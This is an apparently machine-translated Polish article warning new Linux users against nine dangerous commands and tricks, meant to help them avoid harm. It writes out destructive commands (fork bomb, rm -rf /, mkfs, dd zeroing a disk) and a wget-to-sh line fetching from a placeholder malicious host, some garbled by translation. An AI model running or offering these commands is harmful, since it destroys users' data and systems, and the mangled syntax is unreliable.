Główna » Pulpit » 9 poleceń i kodów Linuksa, aby być ostrożnym

    9 poleceń i kodów Linuksa, aby być ostrożnym

    Polecenia powłoki / terminala Linux są bardzo potężne a zwykłe polecenie może doprowadzić do usunięcia folderu, plików lub folderu głównego itp.

    W niektórych przypadkach Linux nawet nie poprosi Cię o potwierdzenie, ale wykona polecenie od razu, powodując stracić cenne dane i informacje przechowywane w tych plikach i folderach.

    Ludzie często publikują treści w sieci zalecanie nowym użytkownikom Linuksa wykonania tych poleceń. Może to wydawać się żartem dla kogoś, kto opublikował treść, ale nie jest to śmiech dla osoby po drugiej stronie.

    Zebraliśmy kilka poleceń Linuksa, które są dość szkodliwe dla twojego systemu, aby pomóc Ci ich uniknąć. Pamiętaj, że są one rzeczywiście niebezpieczne i można nawet zmieniać na różne sposoby, aby tworzyć nowe polecenia zadawać więcej obrażeń.

    Ważną rzeczą do odnotowania jest to niektóre z tych poleceń są niebezpieczne tylko wtedy, gdy mają prefiks sudo w Ubuntu. Podczas gdy w innych dystrybucjach Linuksa, większość tych poleceń będzie niebezpieczna do wykonania jako root.

    Spójrz na 9 poleceń i kodów, których należy unikać.

    1. Komenda Bombowa Linuksa

    : () : |: & ;: znany również jako Widelec Bomb to atak typu „odmowa usługi” na system Linux. : () : |: & ;: jest funkcją bash. Po wykonaniu, powtarza się wiele razy, aż system się zawiesza.

    Możesz się go pozbyć tylko poprzez ponowne uruchomienie systemu. Więc bądź ostrożny podczas wykonywania tego polecenia w powłoce Linuksa.

    2. Folder mv / dev / null Polecenie

    folder mv / dev / null to kolejne ryzykowne polecenie. Dev / null lub puste urządzenie jest plik urządzenia, który odrzuca wszystkie zapisane na nim dane, ale zgłasza, że ​​operacja zapisu została wykonana pomyślnie. Znany jest również jako nieco wygięty lub czarna dziura.

    3. Komenda rm -rf

    rm -rf polecenie to szybki sposób usuń folder i jego zawartość w systemie operacyjnym Linux. Jeśli nie wiesz, jak go właściwie używać, może stać się bardzo niebezpieczny dla systemu. Najczęstsze kombinacje i opcje używane z poleceniem rm-rf wymieniono poniżej:

    • rm polecenie służy do usuwania plików w systemie Linux.
    • rm -f polecenie usuwa pliki tylko do odczytu w folderze bez monitowania.
    • rm -r polecenie usuwa rekurencyjnie zawartość folderu.
    • rm -d polecenie służy do usunięcia pustego katalogu, ale odmówi usunięcia katalogu, jeśli nie jest pusty.
    • rm -rf / Polecenie służy do wymuszonego usuwania (usuwa je, nawet jeśli jest zabezpieczone przed zapisem) całej zawartości katalogu głównego i podfolderów.
    • rm -rf * polecenie służy do wymuszonego usunięcia całej zawartości bieżącego katalogu (katalogu, w którym aktualnie pracujesz) i podfolderów.
    • rm -rf. polecenie służy do wymuszonego usunięcia całej zawartości bieżącego folderu i podfolderów. The rm -r. [^.] * można również użyć polecenia.
    • rm -i polecenie służy do usuwania plików i folderów, ale przed usunięciem pojawi się monit.

    4. Komenda mkfs

    mkfs może być niebezpiecznym poleceniem dla systemu opartego na Linuksie, jeśli nie znasz jego celu. Wszystko napisane po mkfs zostanie sformatowane i zastąpione pustym systemem plików Linux.

    Wszystkie wymienione poniżej polecenia sformatują dysk twardy i wymagają uprawnień administratora:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    Komenda mkfs.cramfs zrobi to samo co powyżej, ale nie wymaga uprawnień administratora do wykonania.

    5. Tar Bomb

    The smoła polecenie służy do łączenia wielu plików w jeden plik (plik zarchiwizowany) w .smoła format. Za pomocą tego polecenia można utworzyć bombę z archiwum taśm (Tar).

    To jest plik archiwum, który eksploduje w tysiące lub miliony plików o nazwach podobnych do istniejących plików w bieżącym katalogu zamiast w nowym katalogu, gdy nie jest rozpakowany.

    Możesz uniknąć stania się ofiarą tar bomb regularne tworzenie nowego katalogu ochronnego za każdym razem, gdy otrzymasz plik tar a następnie przeniesienie odebranego pliku tar do tego katalogu przed rozpakowaniem.

    Jeśli plik tar jest rzeczywiście bombą tar, możesz po prostu usunąć nowo utworzony katalog, aby się go pozbyć. Innym sposobem uniknięcia wybuchu bomby smolistej jest via -t opcja wyświetlania całej zawartości pliku tar aby dać ci wyobrażenie o typie zawartości zawartej w pliku tar.

    6. Polecenie dd

    The dd polecenie jest używane kopiowanie i konwertowanie partycji dysku twardego. Jednak może okazać się szkodliwe, jeśli określisz niewłaściwe miejsce docelowe.

    Komenda może być jedną z następujących:

    • dd if = / dev / hda z = / dev / hdb
    • dd if = / dev / hda z = / dev / sdb
    • dd if = coś z = / dev / hda
    • dd if = coś z = / dev / sda

    Następujące polecenie spowoduje wyzerowanie całego podstawowego dysku twardego: dd if = / dev / zero z = / dev / had

    7. Kod skryptu powłoki

    Ktoś może cię prześladować dając Ci link do skryptu powłoki i zatwierdzając go do pobrania i wykonania. Skrypt może zawierać złośliwy lub niebezpieczny kod wewnątrz. The format polecenia może wyglądać tak: wget http: // some_malicious_source -O- | sh. The wget pobierze skrypt, gdy sh pobierze wykonanie skryptu.

    8. Złośliwy kod źródłowy

    Ktoś daje ci kod źródłowy i prosi o jego skompilowanie. Kod może wydawać się normalnym kodem, ale w rzeczywistości jakiś złośliwy kod jest ukryty w dużym kodzie źródłowym i może to spowodować uszkodzenie systemu. Aby uniknąć bycia ofiarą tego rodzaju ataku, akceptuj i kompiluj swój kod źródłowy tylko z wiarygodnych źródeł.

    9. Bomba dekompresyjna

    Otrzymałeś skompresowany plik i zostaniesz poproszony o wyodrębnienie tego pliku, który wygląda na bardzo mały, ale może mieć kilka KB. w rzeczywistości, ten niewielki skompresowany plik zawiera bardzo mocno skompresowane dane.

    Po rozpakowaniu pliku wyodrębniane są setki GB danych może wypełnić twój dysk twardy obniżyć wydajność systemu. Aby uniknąć tej sytuacji, zawsze pamiętaj o akceptowaniu danych z wiarygodnych źródeł.